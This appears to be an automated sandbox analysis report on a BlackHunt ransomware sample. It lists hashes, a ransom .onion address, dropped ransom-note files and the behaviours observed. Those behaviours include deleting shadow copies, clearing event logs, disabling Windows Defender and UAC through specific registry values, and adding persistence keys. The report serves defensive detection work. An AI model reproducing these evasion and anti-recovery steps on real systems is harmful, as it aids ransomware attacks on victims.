Analysis
max time kernel: 179s
max time network: 170s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18/01/2024, 23:54
Static task: static1
Behavioral task: behavioral1
  Sample: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
  Resource: win10v2004-20231215-en
General
Target: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Size: 707KB
MD5: 050c63191280ddb539b8175a7638828a
SHA1: 95d84dc1722a532d05190d5a39e1164c992ea098
SHA256: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb
SHA512: 1917817ca31a04b98f0ff90f79f4dd8984410287849ecc43c096b89a0df176f01a092c407f9bdf0d1280394186fdd419930da9fd0640296f3d78476ab31186a4
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1x8Evnh:6uaTmkZJ+naie5OTamgEoKxLWk6h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid | Process
3064 | fsutil.exe
2752 | fsutil.exe

description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Clears Windows event logs (1 TTP, 5 IoCs)
pid | Process
816 | wevtutil.exe
4268 | wevtutil.exe
5048 | wevtutil.exe
1384 | wevtutil.exe
3208 | wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 4 IoCs)
pid | Process
6140 | bcdedit.exe
548 | bcdedit.exe
3728 | bcdedit.exe
4208 | bcdedit.exe

Renames multiple (345) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid | Process
5372 | wbadmin.exe
3692 | wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\W: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\M: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\S: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\G: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\J: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\F: | fsutil.exe
File opened (read-only) | \??\T: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\A: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\K: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\Z: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\U: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\P: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\X: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\V: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\Y: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\L: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\E: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\I: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\M: | fsutil.exe
File opened (read-only) | \??\N: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\O: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\H: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\B: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\Q: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened (read-only) | \??\R: | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
24 | ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Drops file in Program Files directory (64 IoCs)
description | ioc | Process
File created | C:\Program Files\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\jpeg.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\ext\localedata.jar | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\javafx\libxslt.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngdatatype.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\COPYRIGHT | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\gl.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\InitializeOut.odp | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11cryptotoken.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngcc.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\th.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\javafx\glib.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\ecc.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\thaidict.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\de.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_ReadMe.txt | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\trusted.libraries | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\joni.md | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\Java\jre-1.8\legal\#BlackHunt_Private.key | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.hta | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2904 | schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
4444 | vssadmin.exe
1820 | vssadmin.exe
6120 | vssadmin.exe
6132 | vssadmin.exe
4548 | vssadmin.exe
3668 | vssadmin.exe

Modifies registry class (8 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid | Process
4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Suspicious use of AdjustPrivilegeToken (23 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeRestorePrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeBackupPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeTakeOwnershipPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeAuditPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeSecurityPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeIncBasePriorityPrivilege | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Token: SeBackupPrivilege | 4856 | vssvc.exe
Token: SeRestorePrivilege | 4856 | vssvc.exe
Token: SeAuditPrivilege | 4856 | vssvc.exe
Token: SeBackupPrivilege | 6112 | wbengine.exe
Token: SeRestorePrivilege | 6112 | wbengine.exe
Token: SeSecurityPrivilege | 6112 | wbengine.exe
Token: SeSecurityPrivilege | 3208 | wevtutil.exe
Token: SeBackupPrivilege | 3208 | wevtutil.exe
Token: SeSecurityPrivilege | 4268 | wevtutil.exe
Token: SeBackupPrivilege | 4268 | wevtutil.exe
Token: SeSecurityPrivilege | 5048 | wevtutil.exe
Token: SeBackupPrivilege | 5048 | wevtutil.exe
Token: SeSecurityPrivilege | 1384 | wevtutil.exe
Token: SeBackupPrivilege | 1384 | wevtutil.exe
Token: SeSecurityPrivilege | 816 | wevtutil.exe
Token: SeBackupPrivilege | 816 | wevtutil.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 4756 wrote to memory of 2812 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 94
PID 4756 wrote to memory of 2812 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 94
PID 4756 wrote to memory of 1488 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 96
PID 4756 wrote to memory of 1488 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 96
PID 4756 wrote to memory of 224 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 98
PID 4756 wrote to memory of 224 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 98
PID 4756 wrote to memory of 1072 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 102
PID 4756 wrote to memory of 1072 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 102
PID 2812 wrote to memory of 1320 | 2812 | cmd.exe | 100
PID 2812 wrote to memory of 1320 | 2812 | cmd.exe | 100
PID 1488 wrote to memory of 1976 | 1488 | cmd.exe | 103
PID 1488 wrote to memory of 1976 | 1488 | cmd.exe | 103
PID 4756 wrote to memory of 1328 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 104
PID 4756 wrote to memory of 1328 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 104
PID 224 wrote to memory of 3352 | 224 | cmd.exe | 106
PID 224 wrote to memory of 3352 | 224 | cmd.exe | 106
PID 1072 wrote to memory of 3500 | 1072 | cmd.exe | 107
PID 1072 wrote to memory of 3500 | 1072 | cmd.exe | 107
PID 1328 wrote to memory of 5048 | 1328 | cmd.exe | 108
PID 1328 wrote to memory of 5048 | 1328 | cmd.exe | 108
PID 4756 wrote to memory of 3252 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 110
PID 4756 wrote to memory of 3252 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 110
PID 4756 wrote to memory of 2788 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 112
PID 4756 wrote to memory of 2788 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 112
PID 4756 wrote to memory of 3416 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 114
PID 4756 wrote to memory of 3416 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 114
PID 4756 wrote to memory of 2488 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 116
PID 4756 wrote to memory of 2488 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 116
PID 4756 wrote to memory of 316 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 118
PID 4756 wrote to memory of 316 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 118
PID 4756 wrote to memory of 1692 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 120
PID 4756 wrote to memory of 1692 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 120
PID 4756 wrote to memory of 4856 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 124
PID 4756 wrote to memory of 4856 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 124
PID 3252 wrote to memory of 3432 | 3252 | cmd.exe | 123
PID 3252 wrote to memory of 3432 | 3252 | cmd.exe | 123
PID 4756 wrote to memory of 632 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 125
PID 4756 wrote to memory of 632 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 125
PID 4756 wrote to memory of 5004 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 127
PID 4756 wrote to memory of 5004 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 127
PID 2788 wrote to memory of 1820 | 2788 | cmd.exe | 129
PID 2788 wrote to memory of 1820 | 2788 | cmd.exe | 129
PID 2488 wrote to memory of 3760 | 2488 | cmd.exe | 130
PID 2488 wrote to memory of 3760 | 2488 | cmd.exe | 130
PID 316 wrote to memory of 3940 | 316 | cmd.exe | 132
PID 316 wrote to memory of 3940 | 316 | cmd.exe | 132
